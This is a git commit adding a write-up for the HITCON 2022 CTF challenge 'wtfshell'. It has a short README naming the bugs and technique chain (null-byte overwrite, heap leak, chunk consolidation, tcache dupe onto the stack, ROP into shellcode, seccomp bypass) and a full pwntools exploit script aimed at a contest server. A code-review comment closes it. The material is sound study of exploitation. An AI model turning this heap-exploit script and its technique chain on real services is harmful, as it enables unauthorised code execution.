Commit d183fe3

Alex LinAlex Lin
Alex Lin
authored and
Alex Lin
committed
Wtfshell writeups
1 parent a886c09 commit d183fe3

3 files changed

+565
-0
lines changed


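--- a/2022/hitcon-2022/wtfshell/README.md
+++ b/2022/hitcon-2022/wtfshell/README.md
@@ -0,0 +1 @@
+The bug is in strtok and remove\_slash, allowing us a null byte overwrite to 0x21 '!'. Another bug is non-null terminated password, which gives us heap leak. Heap massage and use bug to backwards consolidate overlapping chunks. Tcache dupe onto stack, ropchain into shellcode, use openat in 32-bit mode to bypass seccomp.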

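--- a/2022/hitcon-2022/wtfshell/solve.py
+++ b/2022/hitcon-2022/wtfshell/solve.py
@@ -0,0 +1,177 @@
+from pwn import *
+
+a = open("log", "w")
+
+# r = process("./wtfshell")
+r = remote("35.233.147.96", 42531)
+
+def rec(): return r.recvuntil("\xe2\x88\x9a ")
+rec()
+r.sendline("stfu.B")
+r.sendline("stfu.A")
+rec()
+
+leak = "\x80"
+
+r.sendline("asap.A")
+r.recvuntil(":")
+r.send("A"*0x40)
+r.recvuntil(":")
+r.send("A"*0x40)
+
+while len(leak) < 6:
+    for c in range(0, 256):
+        print(c)
+        if c == 10:
+            continue
+
+        a = ""
+        r.send(chr(c) + "\n")
+        try:
+            a = r.recvuntil("\xe2\x88\x9a ", timeout=0.5)
+        except:
+            pass
+
+        if "\xe2\x88\x9a" not in a or "Q.E.D" in a:
+            leak += chr(c)
+            print(leak)
+            break
+        else:
+            r.sendline("asap.A")
+            r.recvuntil(":")
+            r.send("A"*0x40)
+            r.recvuntil(":")
+            r.send("A"*0x40)
+            for k in leak:
+                r.send(k)
+
+heap = u64(leak + "\x00\x00")
+print("HEAP", hex(heap))
+
+r.sendline("sus.A")
+r.sendline("A")
+r.sendline("sus")
+rec()
+
+files = [chr(0x41 + i) for i in range(30)]
+for i in range(20):
+    r.sendline("nsfw.{}.3".format(files[i]))
+    rec()
+r.sendline("wtf." + "B"*0x3f8 + ".A")
+rec()
+for i in range(12):
+    r.sendline("rip.A")
+    if i == 0:
+        payload = "A"*8 + "/\x03//////"
+        r.send(payload + "A"*(0x100 - len(payload)))
+    else:
+        r.send("D"*0x100)
+    rec()
+
+r.sendline("wtf." + "B"*0x3f8 + ".B")
+rec()
+
+for i in range(4, 4+6):
+    r.sendline("wtf." + "B"*0x3f8 + "." + files[i]) # E, F, G, H, I, J
+    rec()
+for i in range(4+6, 4+6+7):
+    r.sendline("wtf." + "B"*0x2e8 + "." + files[i]) # E, F, G, H, I, J
+    rec()
+
+r.sendline("rip.A")
+r.send("D"*0x100)
+rec()
+
+
+r.sendline("wtf." + "B"*0x3f8 + ".C") # 0x410 chunk
+rec()
+
+r.sendline("wtf." + "D"*0x3f8 + ".D")
+rec()
+for i in range(4):
+    r.sendline("rip.D")
+    r.send("D"*0x100)
+    rec()
+
+for i in range(4+6, 4+6+7):
+    r.sendline("gtfo." + files[i])
+    rec()
+r.sendline("gtfo.E")
+r.sendline("gtfo.F")
+r.sendline("gtfo.G")
+r.sendline("gtfo.H")
+r.sendline("gtfo.I")
+r.sendline("gtfo.J")
+r.sendline("rip.C")
+r.sendline("B"*0x10)
+for i in range(7): rec()
+
+r.sendline("irl")
+rec()
+
+# Now let's construct 0x321 victim
+for i in range(10):
+    r.sendline("nsfw.{}.3".format(files[i]))
+    rec()
+
+r.sendline("wtf." + "A"*0x2b8 + ".A")
+rec()
+
+r.sendline("wtf." + "E"*0x208 + ".B") # B is victim
+rec()
+r.sendline("rip.B")
+r.send("E"*0x100)
+rec()
+
+# Eat up other bins
+r.sendline("wtf." + "A"*0x170 + ".C")
+rec()
+r.sendline("wtf." + "A"*0x130 + ".D")
+rec()
+r.sendline("wtf." + "A"*0xb0 + ".E")
+rec()
+r.sendline("wtf." + "A"*0x30 + ".F")
+rec()
+r.sendline("wtf." + "A"*0x220 + ".G")
+rec()
+r.sendline("wtf." + "A"*0x220 + ".H")
+rec()
+
+# Trigger bug
+r.send("A"*0x400)
+rec()
+r.send("gtfo." + "A"*(0x400 - 5))
+rec()
+
+for i in range(6):
+    r.sendline("wtf." + "F"*(0x2f8 + (6 - i)) + "\x31" + ".B")
+    rec()
+
+r.sendline("wtf." + "F"*0x2f8 + "\x01\x09" + ".B")
+rec()
+
+victim_addr = heap + 0xa30
+fake_fd_bk = heap + 0x740
+fake_unlink = fake_fd_bk - 0x10
+
+# Do backwards consolidation
+payload = "gtfo.B."
+payload += "A"*(0x100-len(payload)) + p64(0x0) + p64(0x301) + p64(fake_fd_bk) + p64(fake_fd_bk) + p64(fake_unlink)*2
+r.sendline(payload)
+rec()
+
+for i in range(2):
+    uname = chr(0x41 + i)*2
+    r.sendline("stfu,{}.".format(uname))
+    rec()
+
+r.sendline("sus.BB")
+r.sendline("nsfw.flag.3")
+
+flag_loc = heap - 0x520
+
+payload = "A"*0xff + "." + p64(0x0) + p64(0x61) + "B"*0x40 + p64(flag_loc) + "\x02"
+r.sendline(payload)
+r.sendline("lol.-l")
+
+r.interactive()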
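Review bot: The file handle opened at the top of the hunk as `a = open("log", "w")` is shadowed by `a = ""` inside the byte-leak loop, so the log file is never written to or closed; either drop the `open` or give it a distinct name, e.g. `log = open("log", "w")`. The bare `except:` around the timed `recvuntil` should name what it is meant to swallow — `except EOFError:` — since a timed-out `recvuntil` in pwntools returns an empty result rather than raising, and a bare clause would also hide a `KeyboardInterrupt` during the long loop. The script mixes `str` and `bytes` throughout (`chr(c)`, `u64(leak + "\x00\x00")`, `"\xe2\x88\x9a" not in a`), which appears to assume Python 2 pwntools; a one-line header comment stating the interpreter and pwntools version it was run against would save the next reader a confusing failure. The hard-coded `remote(...)` target is a per-event value and could likewise be marked with a comment as the contest instance.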
